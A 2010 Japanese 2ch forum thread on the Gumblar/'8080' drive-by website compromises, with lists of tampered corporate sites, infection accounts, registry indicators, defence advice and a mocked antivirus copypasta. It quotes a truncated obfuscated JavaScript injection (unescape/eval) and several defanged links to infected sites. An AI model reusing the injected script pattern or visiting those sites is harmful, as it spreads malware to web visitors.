私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。

ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

405:名無しさん@お腹いっぱい。
10/01/07 01:27:05
コピペ乙

406:名無しさん@お腹いっぱい。
10/01/07 01:45:25
年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…

407:名無しさん@お腹いっぱい。
10/01/07 01:52:47
民主党サイトが年末から年始にかけて改ざん - 政治的意図なし
カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装


408:名無しさん@お腹いっぱい。
10/01/07 01:59:19
詳しくない者だが、経緯を書いておく。

年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。

再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。

次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも?と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。

その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。

409:名無しさん@お腹いっぱい。
10/01/07 02:00:40
Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと
判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。

ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が50%になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。

今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が5%くらいに
落ちた。多分、解決。

今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。

410:名無しさん@お腹いっぱい。
10/01/07 02:11:16
>>409
OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ

411:名無しさん@お腹いっぱい。
10/01/07 02:19:00
>410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール
するくらいなら、新しいPCを7で自作しようか検討中。

自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。

今回のウイルスは8,9年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。

412:名無しさん@お腹いっぱい。
10/01/07 02:23:37
水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず
ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象

413:名無しさん@お腹いっぱい。
10/01/07 02:25:23
/*GNU GPL*/ 感染サイトを見る

Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される

FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される

盗まれたFTPのID、パスでサイトを改ざん

ループ

414:名無しさん@お腹いっぱい。
10/01/07 02:27:22
GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな?

415:名無しさん@お腹いっぱい。
10/01/07 02:28:59
Adobe Readerだけじゃないよ
URLリンク(www.so-net.ne.jp)

416:名無しさん@お腹いっぱい。
10/01/07 02:34:46
基本、JSは信頼サイト以外は止めてるが・・・大手の有名サイトでも感染する事があるから100%安全じゃないだろうな
未知のセキュリティホールを突かれない事を祈るばかり

417:名無しさん@お腹いっぱい。
10/01/07 02:39:08
> 未知のセキュリティホールを突かれない事を祈るばかり

それを考えるとHIPS入れておく方がいいのかね

418:名無しさん@お腹いっぱい。
10/01/07 02:41:37
こんなに多くのサイトがやられるんじゃ
市販のウィルスソフトなんか役に立たないと
ばれちゃうなw

419:名無しさん@お腹いっぱい。
10/01/07 02:43:24
ウイルス対策ソフトは検体が無いと対策は取れないからねえ
まあ、これは現実世界のウイルスでも同じだけど

420:名無しさん@お腹いっぱい。
10/01/07 02:48:17
UAC→スルー??
ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る

頻繁にブラウジングする立場(様々なオンラインショップで購入したりもする)としては若干怖い

421:名無しさん@お腹いっぱい。
10/01/07 02:56:00
バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど
脅威には感じないけどね(仕事関連は別だけど)

422:名無しさん@お腹いっぱい。
10/01/07 03:08:47
専ブラで2chだけを見るネット生活を送るのがベストか

423:名無しさん@お腹いっぱい。
10/01/07 03:23:21
ガンプラでジオマラでも作ってろチンカスw

424:名無しさん@お腹いっぱい。
10/01/07 03:30:33
そういや専ブラの脆弱性発見ってのも以前あったよな・・・
まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどw
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな?

>>376,395,397
Security Toolに関してはこれだね
URLリンク(blogs.yahoo.co.jp)
URLリンク(blogs.yahoo.co.jp)

8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか?

425:名無しさん@お腹いっぱい。
10/01/07 03:40:01
うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな

426:名無しさん@お腹いっぱい。
10/01/07 03:43:34
9999999円あなたはどしますか?
URLリンク(117117)●fc2web●com/

これはGNU GPLぐっじょぶw・・で宜しいのかな?

427:名無しさん@お腹いっぱい。
10/01/07 04:57:05
感染すると以下の二つが登録される

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"


428:名無しさん@お腹いっぱい。
10/01/07 06:50:12
そこは固定じゃない。バイナリはコロコロ変わる。

429:名無しさん@お腹いっぱい。
10/01/07 07:15:07
ころころなんて変わらないよ

430:名無しさん@お腹いっぱい。
10/01/07 07:19:11
モロゾフなどが感染した今流行のやつはそれだろ
新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない

431:名無しさん@お腹いっぱい。
10/01/07 07:35:14
>>428
どう変わった?

432:名無しさん@お腹いっぱい。
10/01/07 07:39:51
GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。

433:名無しさん@お腹いっぱい。
10/01/07 07:40:00
モロゾフのタイプは>>427であってる
ころころ変わるのは別物

434:名無しさん@お腹いっぱい。
10/01/07 07:40:43
感染しているのはupdateを怠ってる人達だがね

435:名無しさん@お腹いっぱい。
10/01/07 09:08:47
updateを怠ってるなんて出来るの?
終了時に強制的にupdateされない?

436:名無しさん@お腹いっぱい。
10/01/07 09:18:24
flashとかがか
今の段階でそんなこといってたらそら引っかかるわ

437:名無しさん@お腹いっぱい。
10/01/07 09:54:17
>>384
俺もそれ知りたい。

月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社(Macfee,NOD2,MSE,Kasper)の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。

で、>>356>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。

いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw

438:名無しさん@お腹いっぱい。
10/01/07 11:08:43
Spybot、Ad-Aware、Avast、MSEssentialsの4つをインストール(常駐)+MSの悪意のある~を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか?


439:名無しさん@お腹いっぱい。
10/01/07 11:11:20
だから穴の前のついたてを選んでないで
さっさと穴埋めとけ

440:名無しさん@お腹いっぱい。
10/01/07 11:19:50
今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した
一応未然に防いで削除(移動)出来たようだけど、ほんとに大丈夫なのかな?
たった今1日がかりでWindowsのクリーンインストールしたばっかなんだけど

441:名無しさん@お腹いっぱい。
10/01/07 11:24:53
やっぱ2chは怖いね
どのスレだったかCファイル破壊コードとか書かれていたし

442:名無しさん@お腹いっぱい。
10/01/07 11:24:59
ふーん

443:名無しさん@お腹いっぱい。
10/01/07 11:34:36
>>442のような人間が仕込んでるんだろうなw

444:名無しさん@お腹いっぱい。
10/01/07 11:41:22
また馬鹿キャラプレイしてるのか

445:名無しさん@お腹いっぱい。
10/01/07 11:47:30
cファイル破壊コードって何なのさ?

446:名無しさん@お腹いっぱい。
10/01/07 11:48:09
2chスレ内だけで感染できるなら感染してみろや

447:440
10/01/07 11:53:28
>>446
自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね?

448:名無しさん@お腹いっぱい。
10/01/07 11:55:34
どんだけー

449:名無しさん@お腹いっぱい。
10/01/07 11:56:30
検出と感染は違うだろ。
検出に誤検出もなにもない。

450:名無しさん@お腹いっぱい。
10/01/07 11:57:01
2chでJS:Redirector-H [Trj]ならAvastの誤検出

451:名無しさん@お腹いっぱい。
10/01/07 12:01:26
>>449
誤検出はあるだろ

452:名無しさん@お腹いっぱい。
10/01/07 12:02:39
すまん。誤検出はあるな。検出がない。

453:名無しさん@お腹いっぱい。
10/01/07 12:05:02
俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか?
今話題のGumblarってのはサイトを見ただけで感染するようですが

454:名無しさん@お腹いっぱい。
10/01/07 12:17:52
誰かここに癌ブラーのソース貼り付けてたよね
うつったかも

455:名無しさん@お腹いっぱい。
10/01/07 12:29:08
今日は釣り日和なんか?

456:名無しさん@お腹いっぱい。
10/01/07 12:32:44
2ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね?

457:名無しさん@お腹いっぱい。
10/01/07 12:44:51
私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。


458:名無しさん@お腹いっぱい。
10/01/07 12:47:44
コピペ乙

459:名無しさん@お腹いっぱい。
10/01/07 12:48:13
経験豊富なあなたがお勧めする

 Kaspersky Internet Security 2010

これは、買わないといけないね!

460:名無しさん@お腹いっぱい。
10/01/07 13:04:10
AVGは検出してくれないのか?

461:名無しさん@お腹いっぱい。
10/01/07 13:18:44
俺もAVG使ってるんだけど、どうなのか不安なんだよね

462:名無しさん@お腹いっぱい。
10/01/07 13:30:43
ココで合ってる?

URLリンク(pc11.2ch.net) > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬


463:名無しさん@お腹いっぱい。
10/01/07 15:14:14
/*GNU GPL*/とか 呼びにくい
まだ名前ないのか?

464:名無しさん@お腹いっぱい。
10/01/07 15:16:54
JRウイルス

465:名無しさん@お腹いっぱい。
10/01/07 16:37:20
ハウス食品 『 お客様のPCにウィルスを感染させてしまったかも・・・ 』
スレリンク(news板)
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、

>2.対象期間
>2009年12月15日 1:00 ~ 2010年1月5日 15:00
ローソンと一緒か

466:名無しさん@お腹いっぱい。
10/01/07 16:53:19
他所は大変だね。
わたしのとこは絶対大丈夫! うぇぇwwwwWw

え~と
どれどれ 

/*GNU GPL*/ ・・・ (°◇°;)

467:名無しさん@お腹いっぱい。
10/01/07 17:17:22
何で新卒採用情報ページばかり?
偶然?

468:名無しさん@お腹いっぱい。
10/01/07 17:22:50
新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね?

469:名無しさん@お腹いっぱい。
10/01/07 17:23:06
時期的な事情があったりして?

470:名無しさん@お腹いっぱい。
10/01/07 17:25:25
家で更新してんのか

471:名無しさん@お腹いっぱい。
10/01/07 17:31:27
>>447
画像系の直リンにセキュリティソフトが反応しているdけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通


472:名無しさん@お腹いっぱい。
10/01/07 17:49:02
2chブラウザに脆弱性なしということですか?

473:名無しさん@お腹いっぱい。
10/01/07 17:53:22
いや
あったとしても利用されてない

474:名無しさん@お腹いっぱい。
10/01/07 17:54:46
2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ
反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度


475:名無しさん@お腹いっぱい。
10/01/07 17:55:36
ここにコード貼り付けた馬鹿がいるから

476:名無しさん@お腹いっぱい。
10/01/07 19:16:49
コード貼りつけたからって馬鹿とかいうなよ
リンク貼るヤツより遥かにマシ

477:名無しさん@お腹いっぱい。
10/01/07 19:21:30
比べてどうするんだよw
どっちも糞で馬鹿なのには違いない。

478:名無しさん@お腹いっぱい。
10/01/07 19:43:56
>>467-469
某大学のHP陥落が関係していると思われ。


479:名無しさん@お腹いっぱい。
10/01/07 19:49:17
不況のあおりですか。
サイバーテロですね。

480:名無しさん@お腹いっぱい。
10/01/07 20:32:16
どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど
結局どうなのこのGENOだかGumblarだか言うウィルスって

481:名無しさん@お腹いっぱい。
10/01/07 20:33:00
結局誰も何も分かっていない

482:名無しさん@お腹いっぱい。
10/01/07 20:34:43
無償ツールで「Gumblarウイルス」チェックを ~ セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期(2009年7月~9月)と
第3四半期(2009年10月~12月)を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件(37.8%)の被害サイトは、
企業のWebサイトとの情報もある。
URLリンク(www.rbbtoday.com)
途中の文を切ってますがかなり増えてるみたいですね。

483:名無しさん@お腹いっぱい。
10/01/07 20:38:15
>>480
ガンブラーウイルスについての誤った情報にご注意ください。
URLリンク(blogs.yahoo.co.jp)

484:名無しさん@お腹いっぱい。
10/01/07 20:57:31
8080なんて呼んでんのはGENOスレにいるやつだけだろ

485:名無しさん@お腹いっぱい。
10/01/07 21:02:08
Gumblar感染してないか確認する方法は、GENOと同じ?

486:名無しさん@お腹いっぱい。
10/01/07 21:08:03
これって新Gumblar?
URLリンク(break24)●nl/
</head><script language=javascript><!--
~中略~
POF=unescape(f5DJz);eval(POF)})(/&/g);
--></script>
<body>

487:名無しさん@お腹いっぱい。
10/01/07 21:13:49
違うと思う

488:名無しさん@お腹いっぱい。
10/01/07 21:20:26
>>486
それは豚汁

489:名無しさん@お腹いっぱい。
10/01/07 21:23:27
>>484
あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの?
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの

ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・

490:名無しさん@お腹いっぱい。
10/01/07 21:27:15
8080なんて呼んでるやつはごく一部だけって話だろ
ポートじゃわかりにくいし勘違いするやつもいるだろうしな

491:名無しさん@お腹いっぱい。
10/01/07 21:29:23
>>484
早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの?

492:名無しさん@お腹いっぱい。
10/01/07 21:32:07
gumblar亜種ってことで良いだろ
くだらねえことでこだわるなよ


493:名無しさん@お腹いっぱい。
10/01/07 21:32:08
>>490
今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど?
どんな勘違いするんだ??
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・

494:名無しさん@お腹いっぱい。
10/01/07 21:34:22
>>492
Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる

495:名無しさん@お腹いっぱい。
10/01/07 21:34:50
ru指定か?
ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ

496:名無しさん@お腹いっぱい。
10/01/07 21:35:30
>>494
だからなんだよ
しつけえな
くだらねえ

497:名無しさん@お腹いっぱい。
10/01/07 21:37:51
>>494
別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど

498:名無しさん@お腹いっぱい。
10/01/07 21:40:16
テンプレで8080系ってなってるだろ
嫌ならGENOスレでやってくれ

499:名無しさん@お腹いっぱい。
10/01/07 21:41:34
単にテンプレ作ったやつが馬鹿だからだろ
8080なんて普通に使うポート
無知なだけ

500:名無しさん@お腹いっぱい。
10/01/07 21:43:38
8080系ってことはガンブラーの8080系って言いたいんだろ?

501:名無しさん@お腹いっぱい。
10/01/07 21:45:16
呼び名なんて分かれば良いんだよ
世間でガンブラーらなそれで良いだろ
間違いとか言うなよ

502:名無しさん@お腹いっぱい。
10/01/07 21:51:14
>世間でガンブラーらなそれで良いだろ
良くないから感染が広がったんじゃないかと

Gumblar8080とかかっこよくね?

503:名無しさん@お腹いっぱい。
10/01/07 21:51:50
分かればGumblarでもGENOでもなんでもいいよ
でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・

どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ

504:名無しさん@お腹いっぱい。
10/01/07 21:59:16
しかし目的はなんなのかね
ウェブ改竄の被害を楽しんでるだけかな

505:名無しさん@お腹いっぱい。
10/01/07 22:06:36
>>504
8080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな

506:名無しさん@お腹いっぱい。
10/01/07 22:09:16
GumblarもそうだがゾンビPC化すると
DOS攻撃やらなにやらでサイバーテロも起こせるだろ?
金になるとしてもかなり危険だと思うがな

507:名無しさん@お腹いっぱい。
10/01/07 22:10:35
この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな

508:名無しさん@お腹いっぱい。
10/01/07 22:23:06
切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする
ブラウザで判定できたらいいのにっておもう

509:名無しさん@お腹いっぱい。
10/01/07 22:28:42
ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね?
そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと

510:名無しさん@お腹いっぱい。
10/01/07 22:28:48
ブラウザで判定すると早くなるのか?
そんなこと無いから同じ

511:名無しさん@お腹いっぱい。
10/01/07 22:30:04
もうJavaScript切っとけ

512:名無しさん@お腹いっぱい。
10/01/07 22:39:26
別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね
で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い?w

513:名無しさん@お腹いっぱい。
10/01/07 22:41:28
アップデートの徹底がいいのは当然だけど、(ブラウザに定義をカスタマイズできるようにして)
jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。

514:名無しさん@お腹いっぱい。
10/01/07 22:43:53
ウイルスソフトに任せちゃ駄目だよねw

515:名無しさん@お腹いっぱい。
10/01/07 22:51:24
アドビ製品は強制アップデートでおk

516:名無しさん@お腹いっぱい。
10/01/07 22:51:31
>>513
そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか?
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん

そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め

517:名無しさん@お腹いっぱい。
10/01/07 22:59:57
真っ新なマッシン

518:名無しさん@お腹いっぱい。
10/01/07 23:04:54
>>516
ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど

519:名無しさん@お腹いっぱい。
10/01/07 23:17:43
>>518
逆に否定意見が結構集まる気がするw
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・

結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く

520:名無しさん@お腹いっぱい。
10/01/07 23:31:10
ウイルスが先かウイルスソフトが先かという命題と同じ
Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ

521:名無しさん@お腹いっぱい。
10/01/07 23:40:39
なんだか楽天トラベルおかしい?

522:名無しさん@お腹いっぱい。
10/01/07 23:48:19
アメーバがやられた
ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ

523:名無しさん@お腹いっぱい。
10/01/07 23:49:10
ハスクバーナ・ゼノアのHPもGENOに感染してない?
URLリンク(www.zenoah.co.jp)

524:名無しさん@お腹いっぱい。
10/01/07 23:49:24
アメバが駄目なんてずっと前から言われてるよ

525:名無しさん@お腹いっぱい。
10/01/07 23:56:22
>523
ノートン先生に怒られた

526:名無しさん@お腹いっぱい。
10/01/07 23:56:24
>>523

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

URLリンク(www.zenoah.co.jp)

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh

情報:
23:55:06
Kaspersky Internet Security 2010


527:名無しさん@お腹いっぱい。
10/01/07 23:59:51
> Trojan-Downloader.JS.Agent.ewh
いつものだね

528:名無しさん@お腹いっぱい。
10/01/08 00:00:15
だから>>1ぐらい読めよ・・・・

*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***


危険かもしれないってアドレスも含むぞ

529:名無しさん@お腹いっぱい。
10/01/08 00:02:42
>>523
アバストタンにも怒られた

530:名無しさん@お腹いっぱい。
10/01/08 00:09:37
お前らよく平気で踏めるな。


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch